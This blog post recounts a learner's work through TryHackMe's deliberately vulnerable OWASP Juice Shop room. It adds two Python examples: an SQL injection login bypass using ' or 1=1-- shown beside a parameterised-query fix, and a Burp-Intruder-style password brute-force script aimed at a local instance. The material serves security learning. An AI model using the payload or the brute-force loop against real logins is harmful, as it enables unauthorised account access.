TryHackMe: OWASP Juice Shop


The next room in my learning path was the OWASP (Open Web Application Security Project) Juice Shop. This is a deliberately vulnerable web application, a fictional juice shop, set up so you can practise various exploits and attacks against it.

The first task has you browsing the website trying to gain knowledge from the posts that are already there, including the admin email address. It was quite easy to find this, as it was included on a review, but it did take a lot of clicking around.

The next task was using SQL injection to try and log into the site as an administrator. This room held your hand a little more than previous rooms, and laid out the steps to follow pretty easily. Capturing a fake login request using the admin email I’d found before in Burp Suite Proxy, I was able to change the password to the SQL injection payload ' or 1=1-- which tells the database to check the password, or whether 1=1, which is always true, so the login succeeds. The -- at the end comments out any other SQL code which might otherwise run. Pretty cool!
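To make the mechanics concrete, here is an added example (my own toy code, not part of the TryHackMe room or the Juice Shop source) that builds a tiny in-memory SQLite user table, splices the ' or 1=1-- payload into a string-built query the way a vulnerable login does, and then shows the same payload against a parameterised query. The table contents, column names and plaintext passwords are constructed for the illustration; the point is how the quote, the OR and the -- comment reshape the query text.

```python
import sqlite3

# Constructed in-memory user table standing in for a Users table.
# Passwords are stored in plaintext here purely to keep the toy short; the
# point being demonstrated is how the query string is built, not hashing.
USERS = [
    (1, "admin@juice-sh.op", "admin-secret", "admin"),
    (2, "jim@juice-sh.op", "jim-secret", "customer"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT, role TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    return conn


def build_query(email, password):
    """Vulnerable: user input is spliced straight into the SQL text."""
    return (
        f"SELECT email, role FROM users WHERE email = '{email}' "
        f"AND password = '{password}'"
    )


def login_vulnerable(conn, email, password):
    """Returns (email, role) of the first matching row, or None.

    With email = "' or 1=1--" the query becomes
      ... WHERE email = '' or 1=1--' AND password = '...'
    The quote closes the string, OR 1=1 is always true, and -- turns the rest
    of the line (including the password check) into a comment. Every row
    matches and the first one, the admin, is returned.
    """
    rows = conn.execute(build_query(email, password)).fetchall()
    return rows[0] if rows else None


def login_safe(conn, email, password):
    """Hardened: a parameterised query. The same payload is just a string
    compared against the email column, so nothing matches."""
    return conn.execute(
        "SELECT email, role FROM users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(build_query("' or 1=1--", "anything"))
    print(login_vulnerable(db, "' or 1=1--", "anything"))            # admin row
    print(login_vulnerable(db, "admin@juice-sh.op", "' or 1=1--"))   # admin row too in this toy
    print(login_safe(db, "' or 1=1--", "anything"))                   # None
```

In this toy the payload works in either field because the password is compared in plaintext; the hardened version works because the driver sends the payload as a bound value rather than as part of the SQL text.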

After this exercise, it was time to use Burp Suite Intruder, which lets you run through a list of passwords to brute-force a login. You can get wordlists in Kali from SecLists, and then load your chosen list as a payload. Capture a login request with Proxy, send it to Intruder, and mark where you want the payload substituted. Burp uses the § symbol to mark these payload positions: in this case the password field, so each entry in the list is tried there in turn.

Running a brute force password attack on a web login with BS Intruder
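What Intruder is doing under the hood is a simple loop, and it helps to see it written out. The following is an added example of mine (not the room's material and not Burp's code): a sniper-style attack with a fixed email and one payload position, the password. The wordlist is a constructed stand-in for a SecLists file, the login URL is an assumed Juice Shop endpoint, and fake_send is a constructed stand-in for the server so the example runs offline; the attempts list is the equivalent of the status and length columns you sort in Intruder to spot the one response that differs.

```python
import json
import urllib.error
import urllib.request

# Constructed wordlist standing in for a SecLists file such as
# Passwords/Common-Credentials/10-million-password-list-top-100.txt
WORDLIST = ["123456", "password", "qwerty", "admin123", "letmein"]

# Assumed endpoint: Juice Shop's login route; adjust host/port to your instance.
LOGIN_URL = "http://localhost:3000/rest/user/login"


def send_login(url):
    """Returns a function that POSTs one credential pair and reports (status, body_length)."""
    def send(email, password):
        data = json.dumps({"email": email, "password": password}).encode()
        req = urllib.request.Request(
            url, data=data, headers={"Content-Type": "application/json"}
        )
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, len(resp.read())
        except urllib.error.HTTPError as err:
            return err.code, len(err.read())
    return send


def brute_force(email, wordlist, send):
    """Sniper-style attack: fixed email, one payload position (the password).

    Returns (found_password_or_None, attempts); attempts is a list of
    (password, status, length) rows, one per request, like Intruder's results table.
    """
    attempts = []
    for candidate in wordlist:
        status, length = send(email, candidate)
        attempts.append((candidate, status, length))
        if status == 200:          # a successful login is the one row that differs
            return candidate, attempts
    return None, attempts


def fake_send(correct_password):
    """Constructed stand-in for the server so the example runs offline."""
    def send(email, password):
        if password == correct_password:
            return 200, len(b'{"authentication":{"token":"<jwt>"}}')
        return 401, len(b"Invalid email or password.")
    return send


if __name__ == "__main__":
    found, attempts = brute_force("admin@juice-sh.op", WORDLIST, fake_send("admin123"))
    for row in attempts:
        print(row)
    print("found:", found)
    # Against a live instance (assumed URL):
    # found, attempts = brute_force("admin@juice-sh.op", WORDLIST, send_login(LOGIN_URL))
```

Only run this against an instance you own or are authorised to test, such as your own Juice Shop deployment.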

One thing they don’t mention here is how long the cracking takes using the free version. The first couple of times it didn’t seem to be able to crack the password, and it took a couple of hours to go through the list. I’m not sure if this is because I was using a virtual machine, or if my internet was slow, or it is just what happens when you are using the free version of Burp. Either way, it took a few goes before I finally managed to get the password. But it was very satisfying when I managed it!

The rest of the room was following instructions to perform various attacks or access areas of the application, based on OSINT techniques. So far so good, although I have to say that even though these rooms are classed as beginner, there is still a lot of assumed knowledge here. My skills in JavaScript etc. are non-existent, so I’m having to do a lot of detours in my learning to make sure that I am understanding what I’m doing. And even then… I don’t understand!

I’m hoping that as I keep going through, a lot of this will start to click. The Juice Shop is actually an open-source application, and I’m starting to wonder if I could use this with classes next year as part of a cybersecurity course. Food for thought!
